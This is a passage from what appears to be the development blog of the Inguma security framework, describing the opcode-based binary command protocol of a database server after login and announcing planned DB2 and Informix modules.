After this, if both username and password are valid, the user may start sending commands in a new (binary) protocol format. The protocol will have the following structure (not 100% accurate...):

0x00 OPCODE 0x00 0x00 0x00 STRING_DATA 0x00 0x00 0x16 0x00 0x31 0x00 0x0c

The first byte is static and the second one is the OPCODE. The opcode is an index to an internal function pointers array. In example, the OPCODE 0x01 is for executing SQL commands, the OPCODE chr(26) will list all the databases in the server, etc.. These function pointers are stored in the global array "jmpsql".

Well, I hope that we will release a new version in about 1 month or so with modules for DB2 and Informix.

Regards,
Joxean Koret

First post!

2008-08-31T18:39:00.001+02:00

This is the Inguma project's development blog. In the near future (we hope) we will update the blog with information about the new libraries, modules, etc... added to the Inguma framework.